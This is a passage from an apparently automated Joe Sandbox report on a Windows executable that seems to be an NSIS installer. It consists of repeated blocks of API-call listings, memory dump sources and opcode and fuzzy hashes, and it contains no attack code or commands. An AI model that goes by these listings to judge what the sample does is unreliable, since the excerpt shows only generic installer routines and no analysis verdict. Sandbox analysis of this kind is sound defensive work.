                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ZaRP7yvL1J.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-4010320282
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00002BF2), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F95121B: GlobalAlloc.KERNELBASE(00000040,?,6F95123B,?,6F9512DF,00000019,6F9511BE,-000000A0), ref: 6F951225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 6F952657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F95268C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 9bba4744058a5e50eac83d7dc1d5d9cd35691715288ec81bba69fc3da53b26ae
                                                                                                            • Instruction ID: e26e6fcba72a3eadd72d029608c12cba5996301b9517d6a088ec55ffdeac9eb0
                                                                                                            • Opcode Fuzzy Hash: 9bba4744058a5e50eac83d7dc1d5d9cd35691715288ec81bba69fc3da53b26ae
                                                                                                            • Instruction Fuzzy Hash: 5E31AD31A09501DFDB24CF68D9D4C2A77BAFB87324764466AF541871A0C731E87ACF51
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nszB803.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nszB803.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nszB803.tmp$C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dll
                                                                                                            • API String ID: 3109718747-3963267833
                                                                                                            • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                            • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 5c7357d8c33c67e0b07ff50df21b06410a9f4aab9787bf9043ae3994a3357235
